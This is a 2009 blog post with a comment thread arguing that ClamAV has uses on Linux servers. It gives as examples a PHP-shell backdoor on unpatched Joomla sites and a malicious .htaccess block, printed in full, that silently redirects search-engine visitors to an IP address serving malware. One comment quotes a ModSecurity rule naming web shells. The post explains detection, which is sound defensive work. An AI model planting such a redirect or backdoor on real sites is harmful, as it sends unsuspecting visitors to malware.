2 examples of Linux capable malware, for the sceptics

Posted April 6th, 2009 by j00p34

As some people commented on my previous post they don't think you need a virus scanner in Linux, I have some examples.

These things are found by ClamAV:

There is a group of hackers defacing sites, they specialize in Joomla websites. If you run a joomla website for a while, and you don't upgrade it when security updates are published. You have about a 99% change of it being hacked (don't know any real numbers, but I do know people who have experienced this several times).

Backdoor Script

These guys use a backdoor script based on PHP-shell, php shell is a PHP program which gives you a shell like environment in which you can run system commands on a remote server. So if you would just remove the defacement page, they can just put it back. Or what I have also seen, install a email form which can be used to send spam.

the original can be found here:

http://phpshell.sourceforge.net/

You really don't want anybody to install this on your site, it gives them a lot of power on your site.
This is detected by clam av.

Curious about the hacker version?

If you like to have the hackers version, just install a old unpatched joomla version on your website and wait for a few months. Especially in the summer vacations, this is mostly done by script kiddies. It's not very difficult to do.

Hidden redirect

Another nice one I found here:

http://www.provos.org/index.php?/categories/6-Malware

A web application had a vulnerability which allowed the hackers to install a .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http ://89.28.13.204/in.html?s=xx [R,L]

Know what this does? It redirects traffic coming in from major search engines to a site which then tries to install malware. ONLY traffic from major search engines, so if you access your site directly you don't notice anything. Just imagine the damage this can do to your popular website.

.htaccess is a file which is very common on webservers, so you have a small change of noticing this quickly.

And again this is found by ClamAV.

Test the scanner

Test this yourself: just create a local .htaccess file, copy paste the block of rewrite rules, save the file and run the scanner on it. It won't harm you, just don't save it in any web directory.
(I did insert a space between http and : so it won't be seen as a url on this site.)

I think this proofs it can serve a purpose to use a virus scanner, at least as a malware scanner.
Clam AV is free, no harm in using it every once in a while. Just to check if the hackers didn't discover a security hole before you did.

antivirus

Anonymous 1 year 11 weeks 12 hours 16 min ago

Linux is great that it doesn't need antivirus but I would not run production enviroment with out it at all. Even if those are desktops cause you'll never know what is going happen in near future.

Late, but...

Anonymous 1 year 20 weeks 4 days 19 hours ago

I wanted to show you you're not completely wrong, as people have said.

You talk about servers, people talk about desktops, but ClamaAV is alfso useful there: some email clients (e.g. Kmail) support antivirus scanning, which may help in not redistributing an infected mail to your friends, or in identifying tha one of your friends is infected and warn him/her

Of course, ClamAV is very useful on servers. I'm a sysadmin at a Linux/Windows web hosting company and we use it to scan email for our Exchange users. We don't use it (yet) to scan email on all of our servers, but I know several ISPs and hosters do it.

Incidentally, just a few days ago I discovered that ClamAV can also detect PHP-based shells and mail bombers, a feature that will really help keeping our servers more secure. Our customers not always patch their web applications (Joomla, Mambo, PHP-Nuke, Wordpress, etc) and we have a couple of complaints every day (we run more than 10.000 websites, so it's not such a big number but it's annoying to have to clean the same websites every week...).

The biggest problem is that most of the time you DON'T need administrative access to upload malicious content to a vulnerable website, as generally the shells are executed via code injection.

So, ClamAV will make our lives easier here, as we can run it every night to scan our users' websites and report malware, and we won't need to wait until someone sends us a complaint.

Cheers,
Ricardo

Man, you honestly talk too

Anonymous 1 year 21 weeks 1 day 19 hours ago

Man, you honestly talk too much rubbish. The first example is a non-example. What's the name of the script and how does it work? What's the name of the web application with the security flaw? What's Clam Av really supposed to identify? All rubbish. Info, info, please!

I guess I should have been more clear.

Anonymous 1 year 21 weeks 2 days 4 hours ago

My security preferences on Linux are based on my personal desktop. If I were running a Web server, that would change everything.

Well the rss on this is malware

Anonymous 1 year 21 weeks 2 days 5 hours ago

An rss agrigator page I have was knocked of the web by ModSecurity because of the content of the rss for this article oh the irony.

False positives are a horrible pain.

SecRule RESPONSE_BODY "(?:[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma web shell)\b|imhabirligi phpftp)|(?:r(?:emote explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?: commander|-terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft windows\b.{,10}?\bversion\b.{,20}?$c$ copyright 1985-.{,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r inc)\.|(?:www\.sanalteror\.org - indexer and read|haxplor)er|php(?:konsole| shell)|c99shell)\b|aventgrup\.|drwxr))" \
"phase:4,t:none,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Backdoor access',id:'950922',tag:'MALICIOUS_SOFTWARE/TROJAN',severity:'2'"

sorry about that

admin 1 year 21 weeks 2 days 2 hours ago

I'm sorry about that, this htaccess is also part of a worm. So it might be difficult to not false positive it.

Ok, a server should have

Anonymous 1 year 21 weeks 2 days 12 hours ago

Ok, a server should have anti-virus software. but what about linux desktops? i dont have any of the mentioned services running.

So essentially... use an

Anonymous 1 year 21 weeks 2 days 12 hours ago

So essentially... use an 'anti-virus' because... you may have been running an unpatched security hole on your server....

Sorry, but It is very unlikely that Clam AV or any other 'scanner', detect any given security bug before the devs of the buggy application does and before it get patched....

Point in case, you first example says "... and you don't upgrade it when security updates are published."

The second example says "A web application had a vulnerability"
can you be more vague....

This all argument boils down to "you should all take penicillin preemptively, because I know a guy that got syphilis while having unprotected sex, with a prostitute in Zambia..."

BTW, before thinking about antibiotic, one should consider basic hygiene.
In the first case: follow your software security update... in the second case: check your tripwire reports.

These are not Linux malware - they are application specific

Anonymous 1 year 21 weeks 2 days 12 hours ago

In the first case you are talking about an issue in PHP. If I understand this correctly, the malware would be just as successful if PHP were running on top of IIS.

In the second case, this is again an application specific issue - not a Linux specific issue. Again, if I'm correct in reading between the lines, the same hole would exist if Apache were installed on a Windows server.

These are both akin to a MS Word macro "virus". The virus just happens to be running on Windows, but the problem is not Windows per se, but MS Word. In this case the application happens to be Apache and PHP, which just happen to run predominantly on Linux servers. This still doesn't make these Linux specific malware.

Of course, any critical tool (like Apache and PHP) should be kept up to date to avoid these sorts of issues. But that advice goes for ANY platform.

While a virus scanner may find the symptoms of such malware, it can do nothing to prevent it from getting on the system in the first place. ClamAV is usually configured to run periodically rather than on every single access (I could be wrong - been a while since I set up Clam) - like once an hour. It would only report that you had been infected. What happens between the time of infection and the time of detection could be too damaging.

I'd rather just keep things up to date and avoid having to react. Proactive vs Reactive.

My thoughts

Nonsense

Anonymous 1 year 21 weeks 2 days 12 hours ago

This still doesn't prove you NEED an antivirus in Linux. The above examples need the user to have administrative rights to actually upload those scripts to specific directories. As for the Joomla part of the text, I've been running a highly accessed Joomla site for 2 and a half years. never upgraded it. Never been hit. I guess I'm part of that 1%. :)

ok you don't need it

admin 1 year 21 weeks 2 days 9 hours ago

Ok I agree, you don't need it. I'm sorry if I disturbed you with that. It can be useful though.

I really didn't mean to upset anybody. I just think it can be useful. As there are 0-day exploits and security leaks not made public. I generally promote Linux and I know and tell everybody Linux is very secure.
So no harm meant here.